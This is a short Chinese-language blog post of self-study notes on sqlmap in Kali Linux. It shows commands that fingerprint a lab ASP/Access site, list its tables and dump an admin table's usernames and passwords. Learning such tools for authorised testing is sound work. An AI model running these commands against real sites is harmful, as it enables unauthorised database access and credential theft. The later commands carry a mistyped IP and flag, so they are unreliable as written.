sqlmap
欢迎关注博主的公众号:薛定谔的小鱼儿
自学sqlmap,以下是我的部分总结,如果有错误,希望各位大神指出,谢谢。
我在kail环境下进行sqlmap学习。首先进入sqlmap
在安装了sqlmap后,在终端直接输入sqlmap,进入sqlmap。
在进入sqlmap后,选择目标url,如:sqlmap -u http://192.168.1.3:8008/onews.asp?id=45
-u 后是目标url
返回结果可以看到目标主机的操作系统是Windows 2003/XP;web应用技术是asp.net ,IIS,ASP。数据库:access
查看用户
探测数据库中和表信息:sqlmap -u http://19.168.1.3:8008/onews.asp?id=45 --dump -tables
可以看到数据库的结构
查看admin和password的内容:sqlmap -u http://19.168.1.3:8008/onews.asp?id=45 --dump -T admin -C admin,password
成功**。